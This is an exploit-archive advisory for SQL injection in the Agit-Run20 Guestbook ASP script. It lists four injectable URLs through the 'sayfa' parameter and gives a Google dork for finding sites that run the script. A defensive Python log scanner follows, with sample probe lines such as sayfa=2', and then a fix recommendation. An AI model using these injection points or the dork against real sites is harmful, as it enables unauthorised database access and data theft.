Agit-Run20 Guestbook SQL injection



EKU-ID: 1933 CVE: OSVDB-ID:
Author: CWpisagor Published: 2012-04-16 Verified: Verified


##################################################################
# Exploit Title:  Agit-Run20 Guestbook SQL injection
# Date: 15-04-2012
# Author: CWpisagor
# Script Download: http://www.hotscripts.com/listings/jump/download/117358
# Category: Webapps
# Google dork: "Agit-Run20"
# Tested on: Windows 7
##################################################################


www.server.com/path/gb.asp?sayfa=[SQL]

www.server.com/path/Run20.asp?sayfa=[SQL]

www.server.com/path/default.asp?sayfa=[SQL]

www.server.com/path/defter.asp?sayfa=[SQL]



Example Site



Thanks : Volqan , CWKaraKule , Beyaz_Sancak , Servan , Hizmetkar , Mad_Boy and Cyber-Warrior All Users
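Detection sketch for defenders, added here and not part of the original advisory: it scans IIS W3C log lines for requests to the four page names listed above whose `sayfa` value is not a plain number. The log field layout, the sample lines, and the assumption that `sayfa` ("page" in Turkish) only ever carries a page number belong to this example, not to the advisory.

```python
import re
from urllib.parse import parse_qs

# Page names taken from the advisory; compared case-insensitively, as IIS does.
PAGES = {"gb.asp", "run20.asp", "default.asp", "defter.asp"}
# Assumption: sayfa is a page number, so only a short run of digits is valid.
VALID_SAYFA = re.compile(r"\d{1,6}")

def suspicious_sayfa(stem, query):
    """Return the decoded sayfa values that are not plain numbers, or []."""
    if stem.rsplit("/", 1)[-1].lower() not in PAGES:
        return []
    bad = []
    # parse_qs percent-decodes, so 2' and 2%27 are treated the same way.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() == "sayfa":
            bad += [v for v in values if not VALID_SAYFA.fullmatch(v)]
    return bad

def scan_w3c(lines):
    """Yield (client_ip, uri_stem, bad_values) for each flagged log entry."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        query = rec.get("cs-uri-query", "-")
        bad = suspicious_sayfa(rec.get("cs-uri-stem", ""),
                               "" if query == "-" else query)
        if bad:
            yield rec.get("c-ip"), rec["cs-uri-stem"], bad

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-04-16 10:00:01 GET /path/gb.asp sayfa=2 192.0.2.10 200
2012-04-16 10:00:05 GET /path/gb.asp sayfa=2' 198.51.100.7 500
2012-04-16 10:00:09 GET /path/Run20.asp SAYFA=6%27 198.51.100.7 500
2012-04-16 10:00:12 GET /path/index.asp sayfa=abc 192.0.2.10 200
2012-04-16 10:00:15 GET /path/defter.asp - 192.0.2.11 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, bad in scan_w3c(SAMPLE):
        print(f"{ip} {stem} sayfa={bad!r}")
```

The same digits-only rule is the server-side fix: reject or coerce `sayfa` to an integer before it reaches any query, and pass it as a bound parameter.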